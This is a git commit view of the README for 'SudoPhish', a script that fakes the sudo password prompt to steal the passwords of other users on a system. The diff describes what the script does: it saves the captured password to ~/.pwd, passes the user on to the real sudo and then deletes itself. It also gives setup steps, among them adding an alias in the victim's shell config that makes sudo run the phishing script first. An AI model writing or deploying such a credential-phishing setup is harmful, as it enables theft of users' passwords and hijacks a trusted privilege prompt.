SudoPhish

Unnamed repository; edit this file 'description' to name the repository.
Log | Files | Refs | README | LICENSE

commit 59cf35967074c1ff3de7f8c5933447ed24d478a0
parent 2aacb2c46f7e2019c6a9d224d9ac9774a2c3ecb8
Author: MichaelDim02 <31562759+MichaelDim02@users.noreply.github.com>
Date:   Thu,  8 Jul 2021 08:36:15 +0000

Update README.md
Diffstat:
MREADME.md | 15++++++++++++++-
1 file changed, 14 insertions(+), 1 deletion(-)

diff --git a/README.md b/README.md @@ -1,2 +1,15 @@ # SudoPhish -A short script to phish passwords on your system +A short self-destructive script to phish the passwords of the users on your system. + +# What it does ++ It pretends to be the Sudo password prompt and asks the victim for their password ++ Saves the password in a text file ( ~/.pwd ) ++ Redirects the user to real sudo ++ Self-destructs + +# How to set up manually ++ Move everything to the home directory of the user if it isn't there already ++ Make sure you edit the shabang according to the users interactive SH. If they use bash, make sure the script starts with #!/bin/bash , if they use zsh, then make sure it starts with #!/bin/zsh etc. It does not work with fish. Default is bash. ++ Set the $shellfile variable accordingly (line 21). Default is .bashrc ++ Put the following line at the END of the Shell config file: ``` alias sudo=".sp.sh; sudo" ++ Rename the file .sp.sh